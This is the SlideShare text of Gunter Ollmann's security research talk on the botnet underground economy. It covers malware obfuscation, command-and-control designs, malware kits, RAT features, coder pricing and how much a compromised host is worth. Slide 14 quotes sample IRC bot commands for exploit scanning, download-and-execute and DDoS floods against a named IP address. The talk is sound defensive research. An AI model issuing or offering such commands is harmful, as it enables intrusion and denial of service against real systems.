Your computer is worth 30 cents - Gunter Ollmann

1,594 views

Published on

In case you haven’t noticed, there’s a war going on. Malware vendors, SEO consultants, exploit pack developers, content delivery specialists and botnet masters are battling for control of your computer. They’re not battling you or the security systems you’ve deployed – they won that war quite some time ago. No, they’re battling each other over who gets to own your computer – and consequently who gets to make money from it.

The botnet ecosystem is evolving at a rapid pace. Specialized services have come to fill every niche of the hacking world. The frontline is rarely the mechanical process of exploitation and infection – instead it lies with innovative 24x7 support and heldpdesk ticketing systems – quality of service is the competitive edge. How much is your computer worth to them? The price point is dropping day-by-day, but 30 cents is a pretty average trade value. Why is it so low? Because your computer is only part of the ecosystem – and a commodity one at that.

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,594
On SlideShare
0
From Embeds
0
Number of Embeds
3
Actions
Shares
0
Downloads
2
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Your computer is worth 30 cents - Gunter Ollmann

  1. 1. Your Computer Is Worth 30¢ This battle for control of your Gunter Ollmann, Vice President of Research
  2. 2. About  Gunter Ollmann • VP of Research, Damballa Inc.  Damballa Inc. • Atlanta based security company focused on enterprise detection and mitigation of botnets  Brief Bio: • Been in IT industry for two decades Built and run international pentest teams, R&D groups and consulting practices around the world. • Formerly Chief Security Strategist for IBM, Director of X-Force for ISS, Professional Services Director for NGS Software, Head of Attack Services EMEA, etc. • • http://blog.damballa.com & http://technicalinfodotnet.blogspot.com/ Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  3. 3. Perspective… Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  4. 4. Targeted?  Targeted in what sense? Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  5. 5. Targeted Attacks?  Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  6. 6. Access to the enterprise Purchase from botnet Submit a CV masters 2000 2005 2009 Hand out USB drives Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  7. 7. Different Ways of Looking at the Threat? Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  8. 8. Serial Variants Original Malware Code Metamorphism Noise Insertion Compilers Source-code or DIY Random changes to Insertion of noise Different compilers (and malware creator kit the codes structures instructions and versions) are used to generates original code. and procedures. whitespace commands. generate different code. Noise Insertion Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  9. 9. Cryptors, Packers and Binders Original Malware Cryptors Packers Binders Source-code or DIY Encrypt the malware, so Compress the malware Take the malware and malware creator kit it can only be decrypted to make it small, bind it with(in) other generates original code. in real-time on the host. compact and random innocuous software. QA Automatically run the new malware through AV detection tests. Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  10. 10. Avoiding analysis systems Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  11. 11. Virus Testing Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  12. 12. Bot spreading & Support Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  13. 13. Command & Control Evolution Multi-server Topology High resilience to shut-down Random P2P, etc. Star Topology Common clustering Hierarchical Topology Easy to sell/rent branches Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  14. 14. Botnet Command and Control  IRC Command and Control is still common for botnet management  Command language varies upon nature of botnet Sdbot/Reptilecapabilities Rbots 1: scan.start ms08_067_netapi 25 3 download+exec x.x.x.x 1: .udp 208.43.216.195 1995 999999999999 –s 2: .scan 75 1 201.x.x.x 2 1 201.x.x.x 2: .ddos.ack 208.43.216.195 1995 9999999999999 –s 3: .root.start lsass_445 100 3 0 -r –s …typically used for DDoS …scan hosts within a Class-A for port 443 and attempt to exploit (Conflcker) Sample bot command sequence Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  15. 15. IRC CnC Host Controls Agobot SpyBot SDbot Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  16. 16. Zeus & Distribution 1 2 ZEUS DIY Kit • RRP: $400 (street price ~$50) • Botnet CnC package with Web management frontend. 3 • Very popular – many plug-ins developed to extend functionality Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  17. 17. Sophisticated Management Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  18. 18. Sophisticated Management Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  19. 19. Visibility… Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  20. 20. 1 2 Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  21. 21. Keylogger Octopus 1  Basic DIY kit • Evolution of free kit (incl. source code)  $30 for commercial version 3 2 Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  22. 22. RAT Spy-Net v1.8 2 1 3 4 Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  23. 23. RAT Aero-Rat v0.3 3 1 2 Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  24. 24. RAT Turkojan v4  - Trojan creator  V.4 New features 1 • Remote Desktop • Webcam Streaming • Audio Streaming • Remote passwords • MSN Sniffer • Remote Shell • Advanced File Manager • Online & Offline keylogger • Information about remote computer • Etc.. 2  Three versions • Gold, Silver & Bronze Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  25. 25. RAT PayDay v0.1 1 2 3 4 5 7 6 Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  26. 26. Hire-a-Malware-Coder (Custom Build) Platform: software running on MAC OS to Windows Multitasking: have the capacity to work on multiple projects Speed and responsibility: at the highest level Pre-payment for new customers: 50% of the whole price, 30% pre-pay of the whole price for repeated customers Rates: starting from 100 euros I can also offer you another deal, I will share the complete source code in exchange to access to a botnet with at least 4000 infected hosts because I don't have time to play around with me bot right now. Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  27. 27. Hire-a-malware-coder Pricing  Other models exist for hire-a-malware-coder pricing  Component/functionality based pricing • Loader 300 • FTP & Grabber 150 • Assembler Spam bases 220 • Socks 4/5 70 • Botnet manager 600 • Scripts 70 • Password stealers (IE, MSN, etc.) 70 • AV-remover 70 • Screen-grabber 70 Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  28. 28. Competition… Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  29. 29. Builder Battling  Zeus Worlds most popular malware DIY malware construction kit  Helps clear your system before making the malware Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  30. 30. Battling at the Victims Host  Similar kit to Zeus  Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  31. 31. Dynamic Domain Generation  Designed to thwart domain hijacking/closure Sinowal fhwwhkis.com fhksvbjj.com Bobax/Torpig cfzxkefy.2mydns.net kixxgxhi.com Conficker A/B ozzlcjfwxy.mykgb.com dfhkxefj.biz uavpmphb.zipitover.com jstlzaccs.cc xchtucfx.com ehbcihsg.com nltngl.widescreenhd.tv kupgc.info Conficker C mohuajixthb.afraid.org gyagluso.info bjxqjh.com.sv htiukhwb.com vemogoftiv.zipitover.com ezffoozq.biz dgtqwe.be xddjsvgh.com fwsdqcxozwi.mycoding.com hxqbgkyw.org cnxnp.com.py ivfjxxgf.com iaguaku.afraid.org nxmezijg.info btuutlevt.com.mt icdkvcjf.com pxkakigmdx.mario.org sayklyqfhk.org bmjlezym.com.pe zxeytdqgn.mario.org eplgu.org bynzomen.com.mx hlgkiyogcgs.ws daagsup.com.bo oyvtk.cn cequxn.ca cxcsicbqn.ch dcmrfv.gs Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  32. 32. Blacklisted Researchers Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  33. 33. Hack-back  Curiosity killed the cat • Turn botnet against CnC investigators  Identifying the researcher • Repeated lookup of name servers • Resolution request for CnC host name • Wrong port/protocol in CnC connection • Missing handshake or keys • Identify sandbox/VM being used  Response tactics • DDoS the IP address or netblock • Spam flood the researcher • Exploit and breakout of sandbox/VM • Give different (benign) responses to the researcher Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  34. 34. Value… Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  35. 35.  How to pay  Where to look  Mechanisms for validation of buyer/seller Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  36. 36. Making Money With Botnets  Business Motivators for Bot Masters • Active market for purchase/sell of corporate hosts • $500-$20,000 per host • • Markets for the data stolen from botnet hosts • Authentication credentials and PII • Buy/Selling stolen documents • blackhat • Noisy, high-volume, low profit Spam, DDoS, brute-force • Stealthy click-fraud, corporate identity enumeration • Reputation hijacking • Running blackhat services that leverage corporate reputation Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  37. 37. Buying Botnet Victims Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  38. 38. Worth less than you imagine How much? 1/400th of a cent per 24 hours Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  39. 39. Value-added Services Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  40. 40. Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  41. 41. iFrame Traffic Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  42. 42. Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  43. 43. URL Management Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  44. 44. Lookup Resilience  IP Flux • Single-flux • • Double-flux •  Domain Flux • Domain wildcarding • • Domain generation algorithms • Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  45. 45. Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  46. 46. Umm… Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  47. 47. Conclusions Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  48. 48. Thank You! Gunter Ollmann - VP of Research gollmann@damballa.com WWW – http://www.damballa.com Blog - http://blog.damballa.com Blog - http://technicalinfodotnet.blogspot.com Copyright © 2009-2010 Damballa, Inc. All Rights Reserved

×